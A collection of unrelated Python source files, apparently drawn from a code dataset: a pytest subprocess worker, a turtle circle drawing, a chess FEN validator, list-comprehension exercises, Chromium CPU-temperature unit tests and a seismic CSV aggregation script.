# TODO: Race condition?
self._cur_tests.kill()
self.tests_running = False
self.test_stream_connection = None
self._remove_proccess(self._cur_tests.pid)
self._cur_tests = None
def _run_pytest(self, *args):
command = ['pytest', "--capture=tee-sys", "-p", PLUGIN_PATH] + list(args)
logger.info(f"Runing command: {' '.join(command)}")
my_env = os.environ.copy()
my_env["PYTHONUNBUFFERED"] = "1"
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, env=my_env)
logger.debug("Waiting for plugin connection")
conn = self._listener.accept()
self._process[p.pid] = p
return p, conn
def _remove_proccess(self, pid):
try:
self._process.pop(pid)
except KeyError:
logger.warning(f"Trying to remove non-existing pid {pid}")
worker = PytestWorker(TEST_DIR)
|
import turtle
import math
bob = turtle.Turtle()
def polygon(t,n,length):
angle = 360/n
for i in range(n):
bob.fd(length)
bob.lt(angle)
def circle(t,r):
circumference = 2 * math.pi * r
n= int(circumference/3) + 3
length = circumference / n
polygon(t,n,length)
circle(bob,80)
turtle.mainloop() |
import re
VALIDATOR_REGEX = re.compile(
r'\s*([rnbqkpRNBQKP1-8]+\/){7}([rnbqkpRNBQKP1-8]+)' +
r'\s[bw-]\s(([a-hkqA-HKQ]{1,4})|(-))\s(([a-h][36])|(-))\s\d+\s\d+\s*'
)
def validate_fen(fen: str) -> bool:
"""Check the validity of a given FEN string."""
match_obj = re.match(VALIDATOR_REGEX, fen)
if match_obj is None:
return False
return True
|
"""
# Created on Sat Aug 28 12:52:52 2021
# AI and deep learnin with Python
Control Flow
Quiz List and comprehension
"""
# Problem 1:
"""Use a list comprehension to create a new list first_names containing
just the first names in names in lowercase.
"""
names = ["Rick Sanchez", "Morty Smith", "Summer Smith",
"Jerry Smith", "Beth Smith"]
first_names = [name.split()[0].lower() for name in names]
print(first_names)
# Problem 2:
""" Quiz: Multiples of Three
Use a list comprehension to create a list multiples_3 containing
the first 20 multiples of 3.
"""
# Try 1:
times_3 = []
counter = 0
if counter <= 20:
for i in range(1, 61):
if i % 3 == 0:
times_3.append(i)
counter += 1
print(times_3)
#Try 2
times_3 = []
for i in range(1,21):
times_3.append(i * 3)
print(times_3)
# Try 3
multiples_3 = [i*3 for i in range(1,21) ] # write your list comprehension here
print(multiples_3)
# Problem 3
"""Quiz: Filter Names by Scores
Use a list comprehension to create a list of names passed that only
include those that scored at least 65.
"""
# Try 1
scores = {
"Rick Sanchez": 70,
"Morty Smith": 35,
"Summer Smith": 82,
"Jerry Smith": 23,
"Beth Smith": 98
}
passed = []
list_names = scores.items()
for element in list_names:
name, score = element[0], element[1]
if score >= 65:
passed.append(name)
print(passed)
# Try 2
passed = [name for name, score in scores.items() if score >= 65]
print(passed)
|
#!/usr/bin/env python
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Unit tests for the contents of cpu_temperature.py
"""
# pylint: disable=unused-argument
import logging
import unittest
from devil import devil_env
from devil.android import cpu_temperature
from devil.android import device_utils
from devil.utils import mock_calls
from devil.android.sdk import adb_wrapper
with devil_env.SysPath(devil_env.PYMOCK_PATH):
import mock # pylint: disable=import-error
class CpuTemperatureTest(mock_calls.TestCase):
@mock.patch('devil.android.perf.perf_control.PerfControl', mock.Mock())
def setUp(self):
# Mock the device
self.mock_device = mock.Mock(spec=device_utils.DeviceUtils)
self.mock_device.build_product = 'blueline'
self.mock_device.adb = mock.Mock(spec=adb_wrapper.AdbWrapper)
self.mock_device.FileExists.return_value = True
self.cpu_temp = cpu_temperature.CpuTemperature(self.mock_device)
self.cpu_temp.InitThermalDeviceInformation()
class CpuTemperatureInitTest(unittest.TestCase):
@mock.patch('devil.android.perf.perf_control.PerfControl', mock.Mock())
def testInitWithDeviceUtil(self):
d = mock.Mock(spec=device_utils.DeviceUtils)
d.build_product = 'blueline'
c = cpu_temperature.CpuTemperature(d)
self.assertEqual(d, c.GetDeviceForTesting())
def testInitWithMissing_fails(self):
with self.assertRaises(TypeError):
cpu_temperature.CpuTemperature(None)
with self.assertRaises(TypeError):
cpu_temperature.CpuTemperature('')
class CpuTemperatureGetThermalDeviceInformationTest(CpuTemperatureTest):
@mock.patch('devil.android.perf.perf_control.PerfControl', mock.Mock())
def testGetThermalDeviceInformation_noneWhenIncorrectLabel(self):
invalid_device = mock.Mock(spec=device_utils.DeviceUtils)
invalid_device.build_product = 'invalid_name'
c = cpu_temperature.CpuTemperature(invalid_device)
c.InitThermalDeviceInformation()
self.assertEqual(c.GetDeviceInfoForTesting(), None)
def testGetThermalDeviceInformation_getsCorrectInformation(self):
correct_information = {
'cpu0': '/sys/class/thermal/thermal_zone11/temp',
'cpu1': '/sys/class/thermal/thermal_zone12/temp',
'cpu2': '/sys/class/thermal/thermal_zone13/temp',
'cpu3': '/sys/class/thermal/thermal_zone14/temp',
'cpu4': '/sys/class/thermal/thermal_zone15/temp',
'cpu5': '/sys/class/thermal/thermal_zone16/temp',
'cpu6': '/sys/class/thermal/thermal_zone17/temp',
'cpu7': '/sys/class/thermal/thermal_zone18/temp'
}
self.assertEqual(
cmp(correct_information,
self.cpu_temp.GetDeviceInfoForTesting().get('cpu_temps')), 0)
class CpuTemperatureIsSupportedTest(CpuTemperatureTest):
@mock.patch('devil.android.perf.perf_control.PerfControl', mock.Mock())
def testIsSupported_returnsTrue(self):
d = mock.Mock(spec=device_utils.DeviceUtils)
d.build_product = 'blueline'
d.FileExists.return_value = True
c = cpu_temperature.CpuTemperature(d)
self.assertTrue(c.IsSupported())
@mock.patch('devil.android.perf.perf_control.PerfControl', mock.Mock())
def testIsSupported_returnsFalse(self):
d = mock.Mock(spec=device_utils.DeviceUtils)
d.build_product = 'blueline'
d.FileExists.return_value = False
c = cpu_temperature.CpuTemperature(d)
self.assertFalse(c.IsSupported())
class CpuTemperatureLetCpuCoolToTemperatureTest(CpuTemperatureTest):
# Return values for the mock side effect
cooling_down0 = ([45000 for _ in range(8)] + [43000 for _ in range(8)] +
[41000 for _ in range(8)])
@mock.patch('time.sleep', mock.Mock())
def testLetBatteryCoolToTemperature_coolWithin24Calls(self):
self.mock_device.ReadFile = mock.Mock(side_effect=self.cooling_down0)
self.cpu_temp.LetCpuCoolToTemperature(42)
self.mock_device.ReadFile.assert_called()
self.assertEquals(self.mock_device.ReadFile.call_count, 24)
cooling_down1 = [45000 for _ in range(8)] + [41000 for _ in range(16)]
@mock.patch('time.sleep', mock.Mock())
def testLetBatteryCoolToTemperature_coolWithin16Calls(self):
self.mock_device.ReadFile = mock.Mock(side_effect=self.cooling_down1)
self.cpu_temp.LetCpuCoolToTemperature(42)
self.mock_device.ReadFile.assert_called()
self.assertEquals(self.mock_device.ReadFile.call_count, 16)
constant_temp = [45000 for _ in range(40)]
@mock.patch('time.sleep', mock.Mock())
def testLetBatteryCoolToTemperature_timeoutAfterThree(self):
self.mock_device.ReadFile = mock.Mock(side_effect=self.constant_temp)
self.cpu_temp.LetCpuCoolToTemperature(42)
self.mock_device.ReadFile.assert_called()
self.assertEquals(self.mock_device.ReadFile.call_count, 24)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main(verbosity=2)
|
#!/usr/bin/env python2
import os
from argparse import ArgumentParser
from glob import glob
import numpy as np
parser = ArgumentParser()
parser.add_argument("runs_dir", help="location to Runs folder")
args = parser.parse_args()
# csv_files here only used to find valid directories (faults)
csv_files = glob(os.path.join(args.runs_dir, "*", "IM_calc", "*", "*.csv"))
im_faults = set(im_csv.split(os.sep)[-4] for im_csv in csv_files)
del csv_files
for fault in im_faults:
# prepare input files and output dir
csv_set = glob(os.path.join(args.runs_dir, fault, "IM_calc", "*", "*.csv"))
out_dir = os.path.join(args.runs_dir, fault, "IM_agg")
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
# within the set, expect the same columns to be available
with open(csv_set[0], "r") as f:
columns = f.readline().strip().split(",")
cols = []
names = []
for i, c in enumerate(columns):
# filter out pSA that aren't round numbers, duplicates
if not (c.startswith("pSA_") and len(c) > 12 or c in names):
cols.append(i)
names.append(c)
cols = tuple(cols)
dtype = [(n, "f") for n in names]
# first 2 columns are actually strings
dtype[0] = ("station", "|S7")
dtype[1] = ("component", "|S4")
dtype = np.dtype(dtype)
# load all at once, assuming enough memory
csv_np = []
header = ["station"]
for csv in csv_set:
d = np.loadtxt(csv, dtype=dtype, delimiter=",", skiprows=1, usecols=cols)
csv_np.append(d[d["component"] == "geom"])
header.append(os.path.splitext(os.path.basename(csv))[0])
n_csv = len(csv_np)
n_stat = csv_np[0].size
for i in range(n_csv - 1):
assert np.array_equiv(csv_np[i]["station"], csv_np[i + 1]["station"])
# store outputs
dtype = np.dtype(",".join(["|S7"] + ["f"] * n_csv))
fmt = ",".join(["%s"] + ["%f"] * n_csv)
header = ",".join(header)
for c in names[2:]:
out_file = os.path.join(out_dir, "%s.csv" % (c))
out_data = np.zeros(n_stat, dtype=dtype)
out_data["f0"] = csv_np[0]["station"]
for i in range(n_csv):
out_data["f%d" % (i + 1)] = csv_np[i][c]
np.savetxt(
out_file, out_data, fmt=fmt, delimiter=",", header=header, comments=""
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.